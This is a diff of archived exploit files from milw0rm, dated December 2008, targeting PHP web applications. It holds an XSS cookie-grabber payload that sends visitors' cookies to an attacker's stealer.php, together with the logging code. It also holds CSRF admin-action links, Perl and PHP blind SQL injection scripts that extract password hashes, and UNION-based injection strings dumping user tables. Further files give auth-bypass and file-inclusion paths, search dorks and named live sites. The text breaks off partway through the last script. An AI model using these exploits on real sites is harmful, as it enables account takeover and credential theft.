+#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7475.txt b/platforms/php/webapps/7475.txt
index 4ab79486a..5ada1cf5e 100755
--- a/platforms/php/webapps/7475.txt
+++ b/platforms/php/webapps/7475.txt
@@ -1,79 +1,79 @@
-############################################################################################
-[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
-[+] Discovered By SirGod
-[+] Greetz : All my friends
-############################################################################################
-
-[+] Cookie Grabber Exploit
-
- - Steal the cookie of any visitor.
-
-1.Register as :
-
-<script>document.location
-="http://[yourdomain]/[path]/stealer.php?cookie=" +
-document.cookie;</script>
-
-Everyone who visit the index page will be redirected on your cookie
-grabber. (because you will be the Latest Member)
-
-Be sure that you use " and not ' because is forbbiden to use that char
-is your username.
-
-2 . In stealer.php use the following code (simple cookie grabber)
-
-<?php
-$cookie = $_GET['cookie'];
-$log = fopen("log.txt", "a");
-fwrite($log, $cookie ."\n");
-fclose($log);
-?>
-
-Make sure that you have in the stealer.php directory a file log.txt .
-For stealed cookies check log.txt .
-
-3 . You will grab every visitor cookie .
-
-Example (cookie) of a not logged in user :
-
-PHPSESSID=gtolfce6jppb4oasfm81efrqf6
-
-Example (cookie) of a logged in user (admin) :
-
-bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
-PHPSESSID=gtolfce6jppb4oasfm81efrqf6
-
-Username is bb_name.Password is bb_password and is hashed as md5.
-
-[+] Cross Site Request Forgery
-
-If a logged in user with administrative permissions click one of the
-following links the specified action will be executed.
-
-- Delete category
-
-http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
-
-- Delete group
-
-http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
-
-- Ban User
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
-
-- Delete User
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
-
-############################################################################################
-
-# milw0rm.com [2008-12-15]
+############################################################################################
+[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
+[+] Discovered By SirGod
+[+] Greetz : All my friends
+############################################################################################
+
+[+] Cookie Grabber Exploit
+
+ - Steal the cookie of any visitor.
+
+1.Register as :
+
+<script>document.location
+="http://[yourdomain]/[path]/stealer.php?cookie=" +
+document.cookie;</script>
+
+Everyone who visit the index page will be redirected on your cookie
+grabber. (because you will be the Latest Member)
+
+Be sure that you use " and not ' because is forbbiden to use that char
+is your username.
+
+2 . In stealer.php use the following code (simple cookie grabber)
+
+<?php
+$cookie = $_GET['cookie'];
+$log = fopen("log.txt", "a");
+fwrite($log, $cookie ."\n");
+fclose($log);
+?>
+
+Make sure that you have in the stealer.php directory a file log.txt .
+For stealed cookies check log.txt .
+
+3 . You will grab every visitor cookie .
+
+Example (cookie) of a not logged in user :
+
+PHPSESSID=gtolfce6jppb4oasfm81efrqf6
+
+Example (cookie) of a logged in user (admin) :
+
+bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
+PHPSESSID=gtolfce6jppb4oasfm81efrqf6
+
+Username is bb_name.Password is bb_password and is hashed as md5.
+
+[+] Cross Site Request Forgery
+
+If a logged in user with administrative permissions click one of the
+following links the specified action will be executed.
+
+- Delete category
+
+http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
+
+- Delete group
+
+http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
+
+- Ban User
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
+
+- Delete User
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
+
+############################################################################################
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7476.txt b/platforms/php/webapps/7476.txt
index f9ddd9636..1bd6cd757 100755
--- a/platforms/php/webapps/7476.txt
+++ b/platforms/php/webapps/7476.txt
@@ -1,78 +1,78 @@ -#!/usr/bin/perl -w -# Mediatheka <= 4.2 Remote Blind SQL Injection Exploit -# by athos - staker[at]hotmail[dot]it - -use strict; -use LWP::UserAgent; - -my ($stop,$start,$hash); - -my $domain = shift; -my $userid = shift or &usage; - -my @chars = (48..57, 97..102); -my $substr = 1; -my $http = new LWP::UserAgent; - - -&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; - - -sub send_request -{ - my $post = undef; - my $host = $domain; - my $param = shift @_ or die $!; - - $host .= "/connection.php?guest=false"; - $post = $http->post($host,[ - user => $param, - password => 'anything' - ]); - -} - - -sub give_char -{ - my $send = undef; - my ($charz,$uidz) = @_; - - $send = "' or (select if((ascii(substring". - "(password,$uidz,1))=$charz),". - "benchmark(200000000,char(0)),". - "0) from users where id=$userid)#"; - - return $send; -} - - -for(1..32) -{ - foreach my $set(@chars) - { - my $start = time(); - - send_request(give_char($set,$substr)); - - my $stop = time(); - - if($stop - $start > 6) - { - syswrite(STDOUT,chr($set)); - $hash .= chr($set); - $substr++; - last; - } - } -} - -sub usage -{ - print "[?] Mediatheka <= 4.2 Remote Blind SQL Injection Exploit\n"; - print "[?] by athos - staker[at]hotmail[dot]it\n"; - print "[?] 
Usage: perl $0 http://[host/path] [id]\n"; - exit; -} - -# milw0rm.com [2008-12-15] +#!/usr/bin/perl -w +# Mediatheka <= 4.2 Remote Blind SQL Injection Exploit +# by athos - staker[at]hotmail[dot]it + +use strict; +use LWP::UserAgent; + +my ($stop,$start,$hash); + +my $domain = shift; +my $userid = shift or &usage; + +my @chars = (48..57, 97..102); +my $substr = 1; +my $http = new LWP::UserAgent; + + +&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; + + +sub send_request +{ + my $post = undef; + my $host = $domain; + my $param = shift @_ or die $!; + + $host .= "/connection.php?guest=false"; + $post = $http->post($host,[ + user => $param, + password => 'anything' + ]); + +} + + +sub give_char +{ + my $send = undef; + my ($charz,$uidz) = @_; + + $send = "' or (select if((ascii(substring". + "(password,$uidz,1))=$charz),". + "benchmark(200000000,char(0)),". + "0) from users where id=$userid)#"; + + return $send; +} + + +for(1..32) +{ + foreach my $set(@chars) + { + my $start = time(); + + send_request(give_char($set,$substr)); + + my $stop = time(); + + if($stop - $start > 6) + { + syswrite(STDOUT,chr($set)); + $hash .= chr($set); + $substr++; + last; + } + } +} + +sub usage +{ + print "[?] Mediatheka <= 4.2 Remote Blind SQL Injection Exploit\n"; + print "[?] by athos - staker[at]hotmail[dot]it\n"; + print "[?] Usage: perl $0 http://[host/path] [id]\n"; + exit; +} + +# milw0rm.com [2008-12-15] diff --git a/platforms/php/webapps/7478.txt b/platforms/php/webapps/7478.txt index 39933971a..af3a55117 100755 --- a/platforms/php/webapps/7478.txt +++ b/platforms/php/webapps/7478.txt 
@@ -1,19 +1,19 @@
----------------------------------
-The Rat Cms Auth By Pass
----------------------------------
-Autore: x0r
-Email: andry2000@hotmail.it
---------------------------------
-Bug In: \login.php
-
- $sql = "SELECT user_id
- FROM tbl_auth_user
- WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
-
-$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
-
-Exploit: ' or '1=1
-
-^^ Got Root?
-
-# milw0rm.com [2008-12-15]
+---------------------------------
+The Rat Cms Auth By Pass
+---------------------------------
+Autore: x0r
+Email: andry2000@hotmail.it
+--------------------------------
+Bug In: \login.php
+
+ $sql = "SELECT user_id
+ FROM tbl_auth_user
+ WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
+
+$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
+
+Exploit: ' or '1=1
+
+^^ Got Root?
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7479.txt b/platforms/php/webapps/7479.txt
index ef81f938c..2c6b2cab8 100755
--- a/platforms/php/webapps/7479.txt
+++ b/platforms/php/webapps/7479.txt
@@ -1,24 +1,24 @@
-##########################################
-#
-# XOOPS Module: Amevents
-#
-#
-##########################################
-#
-##AUTHOR : netRoot
-####HOME : http://www.passw0rd.info
-#
-####MAİL : msn@passw0rd.info
-#
-###########################################
-#
-# DORKS : dork: /modules/amevents/print.php?id=
-###########################################
-
-target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
-
-Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
-
-live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
-
-# milw0rm.com [2008-12-15]
+##########################################
+#
+# XOOPS Module: Amevents
+#
+#
+##########################################
+#
+##AUTHOR : netRoot
+####HOME : http://www.passw0rd.info
+#
+####MAİL : msn@passw0rd.info
+#
+###########################################
+#
+# DORKS : dork: /modules/amevents/print.php?id=
+###########################################
+
+target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
+
+Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
+
+live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7480.txt b/platforms/php/webapps/7480.txt
index db1fa221e..18ef9fc5d 100755
--- a/platforms/php/webapps/7480.txt
+++ b/platforms/php/webapps/7480.txt
@@ -1,17 +1,17 @@
-###################################
- Remote Sql Injection CadeNix [ index.php ]
- CadeNix Online Games Play Online
-###################################
-# I am , HaCkeR _EgY
-# My Home : www.atsdp.com
-# Message : Mr.SQL Really I miss You , see u sooon My bro :)
-# Script : cadenix
-# Download : http://www.cadenix.com
-# Exploit :
- http://site.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
-# Live Demo :
- http://cadenix.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
-# Admin Panel : http://cadenix.com/demo/admin
-#################### Greetz :: Abo Mohamed #####################
-
-# milw0rm.com [2008-12-15]
+###################################
+ Remote Sql Injection CadeNix [ index.php ]
+ CadeNix Online Games Play Online
+###################################
+# I am , HaCkeR _EgY
+# My Home : www.atsdp.com
+# Message : Mr.SQL Really I miss You , see u sooon My bro :)
+# Script : cadenix
+# Download : http://www.cadenix.com
+# Exploit :
+ http://site.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
+# Live Demo :
+ http://cadenix.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
+# Admin Panel : http://cadenix.com/demo/admin
+#################### Greetz :: Abo Mohamed #####################
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7481.txt b/platforms/php/webapps/7481.txt
index 5cdc8c1f7..1da6c45dc 100755
--- a/platforms/php/webapps/7481.txt
+++ b/platforms/php/webapps/7481.txt
@@ -1,49 +1,49 @@ -[START] - -######################################################################################### -[0x01] Informations: - -Script : WorkSimple 1.2.1 -Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1 -Vulnerability : Remote File Inclusion / Sensitive Data Disclosure -Author : Osirys -Contact : osirys[at]live[dot]it -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay - - -######################################################################################### -[0x02] Bug:[Remote File Inclusion] -###### - -Bugged file is: /[path]/calendar.php - -[CODE] -<?PHP require 'data/conf.php'; //Include the global config ?> - <?php include("$lang") ?> -[/CODE] - -$lang variable is not declared, I thought it was declared on conf.php, but it's not. -So we can set the $lang value directly from GET. - -FIX : Just declare $lang, for example in /[path]/data/conf.php - - -[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell] - -######################################################################################## -[0x03] Bug:[Sensitive Data Disclosure] -###### - -In this cms, when an user register himself, the cms puts informations like username and -password on a .txt file. So, just going on it, we can get sensitive data like username -and passoword. username:md5_hash - - -[!] 
EXPLOIT: /[path]/data/usr.txt - -######################################################################################### - -[/END] - -# milw0rm.com [2008-12-15] +[START] + +######################################################################################### +[0x01] Informations: + +Script : WorkSimple 1.2.1 +Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1 +Vulnerability : Remote File Inclusion / Sensitive Data Disclosure +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay + + +######################################################################################### +[0x02] Bug:[Remote File Inclusion] +###### + +Bugged file is: /[path]/calendar.php + +[CODE] +<?PHP require 'data/conf.php'; //Include the global config ?> + <?php include("$lang") ?> +[/CODE] + +$lang variable is not declared, I thought it was declared on conf.php, but it's not. +So we can set the $lang value directly from GET. + +FIX : Just declare $lang, for example in /[path]/data/conf.php + + +[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell] + +######################################################################################## +[0x03] Bug:[Sensitive Data Disclosure] +###### + +In this cms, when an user register himself, the cms puts informations like username and +password on a .txt file. So, just going on it, we can get sensitive data like username +and passoword. username:md5_hash + + +[!] EXPLOIT: /[path]/data/usr.txt + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-15] diff --git a/platforms/php/webapps/7482.txt b/platforms/php/webapps/7482.txt index f349f1b05..35ec34c6c 100755 --- a/platforms/php/webapps/7482.txt +++ b/platforms/php/webapps/7482.txt 
@@ -1,80 +1,80 @@ - -=========================================================================================================== - - - [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities - - Software : Aperto Blog version 0.1.1 - Vendor : http://code.google.com/p/apertoblog/ - Download : http://code.google.com/p/apertoblog/downloads/list - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -=========================================================================================================== - - - [o] Vulnerable file - - admin.php - - if(isset($_GET['action'])) { - if($_GET['action']=="logout") { - session_destroy(); - go('index.php'); - } else { - if(file_exists($_GET['action'].".php")) { - include($_GET['action'].".php"); - } else { - echo "404"; - - index.php - - if(!$_GET['get']) { - $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10"); - while($row = mysql_fetch_array($articles)) { - showarticle($row, $settings[5]); - } - } elseif(file_exists($_GET['get'].".php")) { - include($_GET['get'].".php"); - } else { - echo "404"; - - categories.php - - if(isset($_GET['id'])) { - $cid = $_GET['id']; - //Load category info - $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'"); - - - - [o] Exploit - - [ Local File Inclusion ] - - http://localhost/[path]/admin.php?action=[LFI] - http://localhost/[path]/index.php?get=[LFI] - - [ SQL Injection ] - - http://localhost/[path]/categories.php?id=[SQL] - - -=========================================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ http://mainhack.com/ ] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! 
[ http://malingsial.serverisdown.org/ ] - - -=========================================================================================================== - -# milw0rm.com [2008-12-15] + +=========================================================================================================== + + + [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities + + Software : Aperto Blog version 0.1.1 + Vendor : http://code.google.com/p/apertoblog/ + Download : http://code.google.com/p/apertoblog/downloads/list + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +=========================================================================================================== + + + [o] Vulnerable file + + admin.php + + if(isset($_GET['action'])) { + if($_GET['action']=="logout") { + session_destroy(); + go('index.php'); + } else { + if(file_exists($_GET['action'].".php")) { + include($_GET['action'].".php"); + } else { + echo "404"; + + index.php + + if(!$_GET['get']) { + $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10"); + while($row = mysql_fetch_array($articles)) { + showarticle($row, $settings[5]); + } + } elseif(file_exists($_GET['get'].".php")) { + include($_GET['get'].".php"); + } else { + echo "404"; + + categories.php + + if(isset($_GET['id'])) { + $cid = $_GET['id']; + //Load category info + $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'"); + + + + [o] Exploit + + [ Local File Inclusion ] + + http://localhost/[path]/admin.php?action=[LFI] + http://localhost/[path]/index.php?get=[LFI] + + [ SQL Injection ] + + http://localhost/[path]/categories.php?id=[SQL] + + +=========================================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ http://mainhack.com/ ] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic OLiBekaS ulga Cungkee 
k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +=========================================================================================================== + +# milw0rm.com [2008-12-15] diff --git a/platforms/php/webapps/7487.txt b/platforms/php/webapps/7487.txt index 58563c6a9..b089bcc29 100755 --- a/platforms/php/webapps/7487.txt +++ b/platforms/php/webapps/7487.txt 
@@ -1,30 +1,30 @@
- !!..:: ZAC003 ::..!!
- -+( Vive int Iranian WhiteHat Nomads Group )+-
--------------------------------------------------------------------------------------------
-Reporter : ZAC003 From Aria-Security.Net
-Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html
-BUG :
-+ class/download.php +
-[Code]
-4: $id = $_GET['id']; //Bug Here !
-5: $how = "n";
-6: $kind = "point";
-7: $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here !
-8: while($r=mysql_fetch_array($result))
-9: {
-[/Code]
-[Exploit]
- Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5
- Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/*
- For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/*
- For View File Name And Secret Key (PROVIDING BE) :
- For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/*
- Upload Shell = [Priv8 Perl Script]
- Update Ads Table(id,text): Use Update SQL Command !
-[/Exploit]
--------------------------------------------------------------------------------------------
-For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools)
-SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group
-greets : M3hd!.h4ckCity And All Member of Aria-Security
-
-# milw0rm.com [2008-12-16]
+ !!..:: ZAC003 ::..!!
+ -+( Vive int Iranian WhiteHat Nomads Group )+-
+-------------------------------------------------------------------------------------------
+Reporter : ZAC003 From Aria-Security.Net
+Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html
+BUG :
++ class/download.php +
+[Code]
+4: $id = $_GET['id']; //Bug Here !
+5: $how = "n";
+6: $kind = "point";
+7: $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here !
+8: while($r=mysql_fetch_array($result))
+9: {
+[/Code]
+[Exploit]
+ Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5
+ Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/*
+ For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/*
+ For View File Name And Secret Key (PROVIDING BE) :
+ For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/*
+ Upload Shell = [Priv8 Perl Script]
+ Update Ads Table(id,text): Use Update SQL Command !
+[/Exploit]
+-------------------------------------------------------------------------------------------
+For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools)
+SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group
+greets : M3hd!.h4ckCity And All Member of Aria-Security
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7489.pl b/platforms/php/webapps/7489.pl
index 9e855e743..5130b0f38 100755
--- a/platforms/php/webapps/7489.pl
+++ b/platforms/php/webapps/7489.pl
@@ -1,46 +1,46 @@
-#!/usr/bin/perl -w
-#
-# Free Links Directory Script V1.2a Remote SQL Injection Exploit
-# written by ka0x <ka0x01[alt+64]gmail.com>
-# D.O.M Labs Security Researchers
-# - www.domlabs.org -
-#
-# Vuln code (report.php):
-#
-# if($_COOKIE['logged']=="") {
-# [...] // login
-# else {
-# $linkida = $_GET['linkid'];
-# $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
-# [...]
-#
-
-use strict;
-use LWP::UserAgent;
-
-my $host = $ARGV[0];
-
-die "[*] usage: perl $0 <host>\n" unless $ARGV[0];
-
-if ($host !~ /^http:/){ $host = 'http://'.$host; }
-
-my $ua = LWP::UserAgent->new() or die ;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
-$ua->timeout(10) ;
-$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs
-
-my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");
-
-my $res = $ua->request($req);
-my $con = $res->content;
-
-if ($res->is_success && $con =~ m/____(.*?)____/ms){
- print $1;
-}
-else {
- print "[-] exploit failed!\n";
-}
-
-__END__
-
-# milw0rm.com [2008-12-16]
+#!/usr/bin/perl -w
+#
+# Free Links Directory Script V1.2a Remote SQL Injection Exploit
+# written by ka0x <ka0x01[alt+64]gmail.com>
+# D.O.M Labs Security Researchers
+# - www.domlabs.org -
+#
+# Vuln code (report.php):
+#
+# if($_COOKIE['logged']=="") {
+# [...] // login
+# else {
+# $linkida = $_GET['linkid'];
+# $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
+# [...]
+#
+
+use strict;
+use LWP::UserAgent;
+
+my $host = $ARGV[0];
+
+die "[*] usage: perl $0 <host>\n" unless $ARGV[0];
+
+if ($host !~ /^http:/){ $host = 'http://'.$host; }
+
+my $ua = LWP::UserAgent->new() or die ;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
+$ua->timeout(10) ;
+$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs
+
+my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");
+
+my $res = $ua->request($req);
+my $con = $res->content;
+
+if ($res->is_success && $con =~ m/____(.*?)____/ms){
+ print $1;
+}
+else {
+ print "[-] exploit failed!\n";
+}
+
+__END__
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7490.php b/platforms/php/webapps/7490.php
index b88c3ec20..7b03d78b2 100755
--- a/platforms/php/webapps/7490.php
+++ b/platforms/php/webapps/7490.php
@@ -1,116 +1,116 @@ -<?php - ini_set("max_execution_time",0); - ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); - print_r(' -############################################################### -# -# Aiyoota! CMS - Blind SQL Injection Exploit -# -# Vulnerability discovered by: Lidloses_Auge -# Exploit coded by: Lidloses_Auge -# Greetz to: -=Player=- , Suicide, g4ms3, enco, -# Palme, GPM, Free-Hack -# Date: 16.12.2008 -# -############################################################### -# -# Dork: inurl:naviid + inurl:liste9 -# Admin Panel: [Target]/cms/ -# Usage (Method 1 auto): php '.$argv[0].' -1 [Target] -# Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file] -# Example (Method 1) for http://www.site.com -# => php '.$argv[0].' -1 http://www.site.com -# Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html -# => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html -# -############################################################### -'); - $automatic = $argv[1]; - $url = $argv[2]; - if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) { - if ($argv[1] == "-1") { - $source = file_get_contents($url."/index.html"); - $buffer = $source; - if (strpos($source,"a href='$url/") != 0) { - $place = strpos($source,"a href='$url/"); - $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/")); - $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'")); - } else { - while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") { - $buffer = substr($buffer,strpos($buffer,"a href='/")); - } - $place = strpos($buffer, "a href='/"); - $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/")); - $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'")); - } - $varstart = 
strpos($urlpart,$sprache)+strlen($sprache)+1; - $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart; - $part1 = substr($urlpart,0,$injplace); - $part2 = substr($urlpart,$injplace); - } elseif ($argv[1] == "-2") { - $part1 = $url."/".$argv[3]."/".$argv[4]; - $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7]; - } - echo "\nExploiting now!\n\n"; - $true = file_get_contents($part1."+and+1=1".$part2); - $false = file_get_contents($part1."+and+1=0".$part2); - $inj = $false; - $tbl = array("benutzer","passwort"); - if (strlen($false) != strlen($true)) { - for ($mode = 0; $mode <= 1; $mode++) { - echo $tbl[$mode].": "; - while ($break == 0) { - $count++; - $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2); - $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2); - $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2); - $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2); - $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2); - if (strlen($false) / strlen($injpart1) * 100 < 98) { - if (strlen($false) / strlen($injpart2) * 100 < 98) { - $border1 = 103; - $border2 = 122; - } else { - $border1 = 96; - $border2 = 108; - } - } - if (strlen($false) / strlen($injpart3) * 100 < 98) { - if (strlen($false) / strlen($injpart4) * 100 < 98) { - if (strlen($false) / strlen($injpart5) * 100 < 98) { - $border1 = 47; - $border2 = 57; - } else { - $border1 = 59; - $border2 = 69; - } - } else { - $border1 = 70; - $border2 = 96; - } - } - for ($i = $border1; $i<=$border2; $i++) { - $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2); - if (strlen($false) / 
strlen($zero) * 100 < 98) { - $break = 1; - echo "\n"; - $i = $border2+1; - } else { - $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2); - if ((strlen($inj) / strlen($true) * 100) < 98) { - echo chr($i); - $i = $border2+1; - } - } - } - } - $break = 0; - $count = 0; - } - } - } else { - echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n"; - } -?> - -# milw0rm.com [2008-12-16] +<?php + ini_set("max_execution_time",0); + ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); + print_r(' +############################################################### +# +# Aiyoota! CMS - Blind SQL Injection Exploit +# +# Vulnerability discovered by: Lidloses_Auge +# Exploit coded by: Lidloses_Auge +# Greetz to: -=Player=- , Suicide, g4ms3, enco, +# Palme, GPM, Free-Hack +# Date: 16.12.2008 +# +############################################################### +# +# Dork: inurl:naviid + inurl:liste9 +# Admin Panel: [Target]/cms/ +# Usage (Method 1 auto): php '.$argv[0].' -1 [Target] +# Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file] +# Example (Method 1) for http://www.site.com +# => php '.$argv[0].' -1 http://www.site.com +# Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html +# => php '.$argv[0].' 
